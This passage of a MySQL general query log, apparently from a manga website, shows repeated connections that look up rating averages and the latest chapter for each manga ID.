330655784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330655784 Quit 330655785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330655785 Quit 330655786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330655786 Quit 330655787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330655787 Quit 330655788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330655788 Quit 330655789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330655789 Quit 330655790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330655790 Quit 330655791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330655791 Quit 330655792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655792 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330655792 Quit 330655793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330655793 Quit 330655794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655794 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330655794 Quit 330655795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330655795 Quit 330655796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655796 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330655796 Quit 330655797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330655797 Quit 330655798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655798 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330655798 Quit 330655799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330655799 Quit 330655800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655800 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330655800 Quit 330655801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330655801 Quit 330655802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655802 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330655802 Quit 330655803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330655803 Quit 330655804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655804 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330655804 Quit 330655805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330655805 Quit 330655806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655806 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330655806 Quit 330655807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330655807 Quit 330655808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655808 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330655808 Quit 330655809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330655809 Quit 330655810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655810 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330655810 Quit 330655811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330655811 Quit 330655812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655812 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330655812 Quit 330655813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330655813 Quit 330655814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655814 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330655814 Quit 330655815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330655815 Quit 330655816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655816 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330655816 Quit 330655817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330655817 Quit 330655818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655818 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 330655818 Quit 330655819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330655819 Quit 330655820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655820 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330655820 Quit 330655821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330655821 Quit 330655822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655822 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330655822 Quit 330655823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330655823 Quit 330655824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655824 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 330655824 Quit 330655825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330655825 Quit 330655826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655826 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330655826 Quit 330655827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330655827 Quit 330655828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655828 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 330655828 Quit 330655829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330655829 Quit 330655830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655830 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330655830 Quit 330655831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330655831 Quit 330655832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655832 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330655832 Quit 330655833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330655833 Quit 330655834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655834 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330655834 Quit 330655835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330655835 Quit 330655836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655836 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330655836 Quit 330655837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330655837 Quit 330655838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655838 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330655838 Quit 330655839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330655839 Quit 330655840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655840 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330655840 Quit 330655841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330655841 Quit 330655842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655842 Query select * FROM chapters where manga_id = '240' order by created desc limit 1 330655842 Quit 330655843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330655843 Quit 330655844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655844 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330655844 Quit 330655845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330655845 Quit 330655846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655846 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330655846 Quit 330655847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330655847 Quit 330655848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655848 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330655848 Quit 330655849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330655849 Quit 330655850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655850 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330655850 Quit 330655851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330655851 Quit 330655852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330655852 Quit 330655853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330655853 Quit 330655854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330655854 Quit 330655855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330655855 Quit 330655856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330655856 Quit 330655857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330655857 Quit 330655858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330655858 Quit 330655859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330655859 Quit 330655860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330655860 Quit 330655861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330655861 Quit 330655862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330655862 Quit 330655863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330655863 Quit 330655864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330655864 Quit 330655865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330655865 Quit 330655866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330655866 Quit 330655867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330655867 Quit 330655868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330655868 Quit 330655869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330655869 Quit 330655870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330655870 Quit 330655871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330655871 Quit 330655872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330655872 Quit 330655873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330655873 Quit 330655874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330655874 Quit 330655875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330655875 Quit 330655876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330655876 Quit 330655877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330655877 Quit 330655878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330655878 Quit 330655879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330655879 Quit 330655880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330655880 Quit 330655881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330655881 Quit 330655882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330655882 Quit 330655883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330655883 Quit 330655884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330655884 Quit 330655885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330655885 Quit 330655886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330655886 Quit 330655887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330655887 Quit 330655888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330655888 Quit 330655889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330655889 Quit 330655890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330655890 Quit 330655891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330655891 Quit 330655892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330655892 Quit 330655893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330655893 Quit 330655894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330655894 Quit 330655895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330655895 Quit 330655896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330655896 Quit 330655897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330655897 Quit 330655898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330655898 Quit 330655899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330655899 Quit 330655900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330655900 Quit 330655901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330655901 Quit 330655902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330655902 Quit 330655903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330655903 Quit 330655904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330655904 Quit 330655905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330655905 Quit 330655906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330655906 Quit 330655907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330655907 Quit 330655908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330655908 Quit 330655909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330655909 Quit 330655910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330655910 Quit 330655911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330655911 Quit 330655912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330655912 Quit 330655913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330655913 Quit 330655914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330655914 Quit 330655915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330655915 Quit 330655916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330655916 Quit 330655917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330655917 Quit 330655918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330655918 Quit 330655919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330655919 Quit 330655920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330655920 Quit 330655921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330655921 Quit 330655922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330655922 Quit 330655923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330655923 Quit 330655924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330655924 Quit 330655925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330655925 Quit 330655926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330655926 Quit 330655927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330655927 Quit 330655928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330655928 Quit 330655929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330655929 Quit 330655930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330655930 Quit 330655931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330655931 Quit 330655932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330655932 Quit 330655933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330655933 Quit 330655934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330655934 Quit 330655935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330655935 Quit 330655936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330655936 Quit 330655937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330655937 Quit 330655938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330655938 Quit 330655939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330655939 Quit 330655940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330655940 Quit 330655941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330655941 Quit 330655942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330655942 Quit 330655943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330655943 Quit 330655944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655944 Query select 